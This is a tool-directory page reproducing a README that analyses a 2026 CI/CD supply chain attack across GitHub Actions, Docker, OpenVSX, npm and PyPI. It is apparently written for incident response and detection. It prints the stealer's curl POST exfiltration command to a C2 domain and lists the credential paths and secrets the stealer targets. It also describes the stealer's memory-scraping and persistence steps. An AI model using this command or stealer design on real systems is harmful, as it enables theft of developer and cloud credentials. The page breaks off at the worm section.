Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
teampcp-supply-chain-attack — CVE-2026-33634 (CVSS 9.4) — The most impactful CI/CD supply chain attack of 2026 so far. | Kitploit
Tools/GitHubGitHub/ugurrates/teampcp-supply-chain-attack
Container SecurityMalware AnalysisCloud SecurityThreat IntelligenceSupply Chain SecurityLearning & EducationIncident ResponseCurated Resources

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHub
ugurrates/teampcp-supply-chain-attack

teampcp-supply-chain-attack

CVE-2026-33634 (CVSS 9.4) — The most impactful CI/CD supply chain attack of 2026 so far.

View Repository
113122 months agoNot yet reviewed

TeamPCP Supply Chain Attack: Technical Analysis & Detection Guide

CVE-2026-33634 (CVSS 9.4) — The most impactful CI/CD supply chain attack of 2026 so far.

Between March 19–25, 2026, threat actor TeamPCP (also tracked as DeadCatx3, PCPcat, ShellForce, CanisterWorm) executed a cascading supply chain compromise across five ecosystems: GitHub Actions, Docker Hub, OpenVSX, npm, and PyPI. Starting from a single incompletely-rotated GitHub PAT, the campaign spread across two major open-source security vendors (Aqua Security and Checkmarx), four GitHub Actions repositories, two VS Code extensions, container registries, and 66+ npm packages.

This repository provides a full technical breakdown, curated IOC lists (FP-tested), and detection queries ready to deploy in Microsoft Defender XDR.


Table of Contents

  • Attack Timeline
  • Kill Chain Breakdown
  • Compromised Artifacts
  • Credential Stealer Mechanics
  • CanisterWorm — npm Propagation
  • Iran-Targeted Wiper Component
  • Detection & Hunting
  • IOC List
  • FP Filtering Notes
  • MITRE ATT&CK Mapping
  • References

Attack Timeline

Date (UTC)Event
Feb 20, 2026hackerbot-claw account created; begins scanning repos for exploitable pull_request_target workflows
Feb 28, 2026First Trivy compromise via PWN request; credentials exfiltrated
Mar 1, 2026Aqua Security attempts containment — credential rotation incomplete
Mar 19, 17:43Main strike: TeamPCP force-pushes 75/76 tags in aquasecurity/trivy-action + all 7 tags in setup-trivy via compromised aqua-bot service account
Mar 19, 18:22Backdoored Trivy v0.69.4 published to GitHub Releases, Docker Hub, GHCR, ECR
Mar 20, 05:40Trivy-action compromise window closes (~12 hours)
Mar 20, 20:45CanisterWorm detected spreading across npm — 47+ packages compromised
Mar 22, 20:31TeamPCP defaces all 44 repos in aquasec-com GitHub org in a scripted 2-minute burst
Mar 22Docker Hub images 0.69.5 and 0.69.6 pushed with same stealer payload
Mar 23, 02:53Checkmarx wave begins: Malicious ast-results v2.53.0 and cx-dev-assist v1.7.0 published to OpenVSX via ast-phoenix account
Mar 23, 12:58All 35 tags of Checkmarx/kics-github-action force-pushed via compromised cx-plugins-releases account
Mar 23, 15:41Checkmarx reports OpenVSX issue resolved
Mar 23, 16:50KICS GitHub Action taken down after user report
Mar 23, 22:25Sysdig reports Checkmarx/ast-github-action v2.3.28 also compromised
Mar 24, 08:30LiteLLM wave: Trojanized litellm v1.82.7 and v1.82.8 published to PyPI using stolen credentials
Mar 24, 11:25PyPI quarantines malicious LiteLLM versions

Kill Chain Breakdown

Phase 1 — Initial Access

Root cause: incomplete credential rotation after the February 28 breach. The aqua-bot service account PAT was either not revoked or the attacker observed the new token during rotation.

TeamPCP used this retained access to force-push version tags to malicious imposter commits. Each forged commit cloned the original's metadata (author, timestamp, message) while replacing the entry point script with the stealer payload. GitHub's release page showed no visible change — even the "Immutable" badge displayed normally.

Phase 2 — Payload Execution

The stealer — a 204-line entrypoint.sh self-identified as "TeamPCP Cloud stealer" — runs a three-stage attack:

Stage 1: Memory Scraping

Reads /proc/<pid>/mem from Runner.Worker processes
Searches for pattern: {"value":"<secret>","isSecret":true}
Extracts GitHub PATs, cloud credentials, API keys from runner memory

Stage 2: Filesystem Credential Sweep

Scans 50+ sensitive paths including:

  • SSH keys (~/.ssh/*)
  • AWS/GCP/Azure credentials
  • Kubernetes tokens and configs
  • Docker registry credentials
  • Terraform state files
  • Crypto wallets (Solana, Bitcoin, Ethereum, Cardano)
  • npm tokens (~/.npmrc)
  • Shell histories
  • .env files

Stage 3: Encrypted Exfiltration

  • Bundles all harvested data into tpcp.tar.gz
  • Encrypts with AES-256-CBC (random session key) + RSA-4096/RSA-OAEP (attacker's public key)
  • Exfiltrates via curl POST to vendor-specific typosquat domains
  • Fallback: creates tpcp-docs or docs-tpcp repo in victim's GitHub account using stolen GITHUB_TOKEN

Phase 3 — Persistence

On non-CI Linux systems, the malware:

  1. Creates hidden directory ~/.config/sysmon/
  2. Drops a Python backdoor (sysmon.py)
  3. Installs a systemd user service that polls C2 every 50 minutes
  4. Kill switch: if C2 response contains "youtube", backdoor skips execution

Phase 4 — Lateral Movement (Checkmarx Wave)

Stolen credentials from the Trivy wave enabled compromise of Checkmarx's ecosystem. Each new wave used a different typosquat C2 domain to evade blocklists from the previous wave:

WaveC2 DomainTyposquat Of
Trivyscan.aquasecurtiy[.]orgaquasecurity.org
Checkmarx/KICScheckmarx[.]zonecheckmarx.com
LiteLLMmodels.litellm[.]cloudlitellm.ai

Compromised Artifacts

GitHub Actions

RepositoryTags CompromisedExposure Window (UTC)Entry Point
aquasecurity/trivy-action75 of 76 (safe: 0.35.0)Mar 19 17:43 – Mar 20 05:40entrypoint.sh
aquasecurity/setup-trivyAll 7 tagsMar 19 17:43 – 21:44action.yaml
Checkmarx/kics-github-actionAll 35 tagsMar 23 12:58 – 16:50setup.sh
Checkmarx/ast-github-actionv2.3.28 (likely all)Mar 23 ~22:25+setup.sh

OpenVSX Extensions (VS Code Marketplace NOT affected)

ExtensionMalicious VersionSafe Version
checkmarx.ast-results2.53.0>= 2.56.0
checkmarx.cx-dev-assist1.7.0>= 1.10.0

Both extensions were published 12 seconds apart at 12:53 UTC on March 23 via the ast-phoenix account. On activation, environmentAuthChecker.js checks for cloud provider credentials, then pulls a second-stage stealer from checkmarx[.]zone/static/checkmarx-util-1.0.4.tgz.

Container Images

ImageMalicious Tags
docker.io/aquasec/trivy0.69.4, 0.69.5, 0.69.6
ghcr.io/aquasecurity/trivy0.69.4, 0.69.5, 0.69.6
public.ecr.aws/aquasecurity/trivy0.69.4, 0.69.5, 0.69.6

PyPI

PackageVersionsBackdoored File
litellm1.82.7, 1.82.8litellm/proxy/proxy_server.py

Triple-nested base64 payload with K8s lateral movement toolkit. Persistence via sysmon.service polling checkmarx.zone/raw.


Credential Stealer Mechanics

The exfiltration pattern is identical across all waves:

curl -s -o /dev/null -w %{http_code} -X POST https://<c2_domain> \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @/tmp/tmp.XXXXXXXXXX/tpcp.tar.gz

The typosquat domain strategy is deliberate: an analyst reviewing CI/CD logs sees curl traffic to what looks like the action's own vendor domain. Without careful comparison, scan.aquasecurtiy.org passes for aquasecurity.org in a fast log review.

Only the attacker can decrypt stolen data — the AES session key is RSA-OAEP encrypted with their public key.


CanisterWorm — npm Propagation

Within 24 hours of the Trivy compromise, stolen npm tokens enabled a self-propagating worm across 66+ packages (141 malicious artifacts).

Download Tool